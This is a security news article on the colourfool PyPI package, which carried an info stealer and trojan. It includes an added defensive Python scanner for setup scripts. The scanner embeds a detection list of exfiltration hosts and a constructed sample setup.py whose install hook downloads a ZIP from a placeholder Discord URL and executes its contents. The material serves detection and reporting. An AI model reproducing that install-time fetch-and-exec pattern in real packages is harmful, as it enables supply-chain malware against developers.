Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

March 2, 2023 | Ravie Lakshmanan | Software Security / Coding


A malicious Python package uploaded to the Python Package Index (PyPI) was found to contain a fully functional information stealer and remote access Trojan.

The package, named colourfool, was identified by Kroll's cyber threat intelligence team, which has dubbed the malware Colour-Blind.

Kroll researchers Dave Truman and George Glass described the package in a report shared with The Hacker News.

Colourfool, like other malicious Python modules discovered in recent months, hides its malicious code in a setup script that points to a ZIP archive payload hosted on Discord.

This file contains a Python script (code.py) with various modules designed to log keystrokes, steal cookies, and disable security software.

In addition to performing defense evasion checks to determine whether it is running in a sandbox, the malware uses Visual Basic scripts to establish persistence and makes use of transfer[.]sh to exfiltrate data.

“As a method of remote control, the malware launches a Flask web application and gives it access to the internet through Cloudflare’s reverse tunnel utility ‘cloudflared’, bypassing inbound firewall rules,” the researchers said.
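The behaviours described above (a setup script that fetches a remote archive, unpacks it and executes the contents, with install-time hooks and references to file-drop services) can be surfaced with a static check before a package is ever installed. The scanner below is an added example for this article and is not code from Kroll, Phylum or the malware itself; the heuristics, the `SetupScanner` class, the host patterns and the sample setup scripts are all assumptions constructed here for illustration.

```python
import ast
import re
from typing import List

# Host patterns drawn from the article's description: payload archive on Discord,
# exfiltration via transfer.sh, remote control through a cloudflared tunnel.
# These are patterns to flag for review, not indicators of compromise.
SUSPICIOUS_HOST_PATTERNS = [
    r"discord(app)?\.com/attachments",
    r"transfer\.sh",
    r"trycloudflare\.com",
]

# Modules and builtins that have no business in a normal setup script.
NETWORK_MODULES = {"urllib", "urllib.request", "requests", "http.client", "socket"}
RISKY_MODULES = {"subprocess", "zipfile", "base64", "ctypes"}
RISKY_BUILTINS = {"exec", "eval", "__import__", "compile"}


class SetupScanner(ast.NodeVisitor):
    """Walks a parsed setup.py and records heuristic findings (hypothetical helper)."""

    def __init__(self) -> None:
        self.findings: List[str] = []

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            self._check_module(alias.name, node.lineno)
        self.generic_visit(node)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:
            self._check_module(node.module, node.lineno)
        self.generic_visit(node)

    def _check_module(self, name: str, lineno: int) -> None:
        root = name.split(".")[0]
        if name in NETWORK_MODULES or root in NETWORK_MODULES:
            self.findings.append(f"line {lineno}: network module '{name}' imported in setup script")
        elif root in RISKY_MODULES:
            self.findings.append(f"line {lineno}: risky module '{name}' imported in setup script")

    def visit_Call(self, node: ast.Call) -> None:
        func = node.func
        if isinstance(func, ast.Name) and func.id in RISKY_BUILTINS:
            self.findings.append(f"line {node.lineno}: dynamic code execution via {func.id}()")
        # setup(cmdclass={...}) replaces the install/develop commands with arbitrary code,
        # which is how a setup script runs a payload at pip install time.
        if isinstance(func, ast.Name) and func.id == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    self.findings.append(f"line {node.lineno}: setup() overrides cmdclass (install-time hook)")
        self.generic_visit(node)

    def visit_Constant(self, node: ast.Constant) -> None:
        if isinstance(node.value, str):
            for pat in SUSPICIOUS_HOST_PATTERNS:
                if re.search(pat, node.value):
                    self.findings.append(f"line {node.lineno}: string references host matching '{pat}'")
        self.generic_visit(node)


def scan_setup_source(source: str) -> List[str]:
    """Return a list of human-readable findings for the given setup.py source text."""
    scanner = SetupScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


# Constructed sample mimicking the pattern the article describes (not the real package).
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request
import zipfile

class PostInstall(install):
    def run(self):
        install.run(self)
        url = "https://cdn.discordapp.com/attachments/EXAMPLE/payload.zip"  # constructed placeholder
        urllib.request.urlretrieve(url, "payload.zip")
        zipfile.ZipFile("payload.zip").extractall(".")
        exec(open("code.py").read())

setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign control: an ordinary declarative setup script.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-pkg", version="0.1", packages=["example_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"[{label}] {len(scan_setup_source(src))} finding(s)")
        for finding in scan_setup_source(src):
            print("  ", finding)
```

The scan is deliberately conservative: it flags imports, dynamic execution, `cmdclass` overrides and host references for a human to review rather than deciding on its own, because legitimate packages occasionally compile native code or download assets at install time. Running it as a pre-install gate (for example on the contents of a downloaded sdist) catches the "fetch a ZIP and exec it" shape without needing a signature for any particular package.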

The use of Cloudflare tunnels mirrors another campaign uncovered by Phylum last month, which used six rogue packages to distribute PoweRAT, also known as Stealer-RAT.

The Trojan is feature-rich: it can collect passwords, terminate applications, take screenshots, log keystrokes, open arbitrary web pages in the browser, execute commands, capture cryptocurrency wallet data, and even spy on victims through their webcams.


The findings come as threat actors have been observed leveraging the source code associated with the W4SP stealer to spawn copycat versions distributed via Python packages such as ratebypass, imagesolverpy, and 3m-promo-gen-api.

Additionally, Phylum discovered three more packages (pycoloured, pycolurate, and colorful) that are used to deliver a Go-based remote access Trojan called Spark.

Beyond the attacks targeting PyPI, the software supply chain security firm also uncovered a large-scale campaign in which unknown attackers published 1,138 packages that retrieve a Rust executable, which is then used to drop additional malware binaries.

“The risk-reward proposition for attackers is worth the relatively small amount of time and effort if they can land a whale in a fat cryptocurrency wallet,” Phylum’s research team said.

“And the loss of a few bitcoins is insignificant compared to the potential damage of losing a developer’s SSH key in a large enterprise such as a corporation or government.”
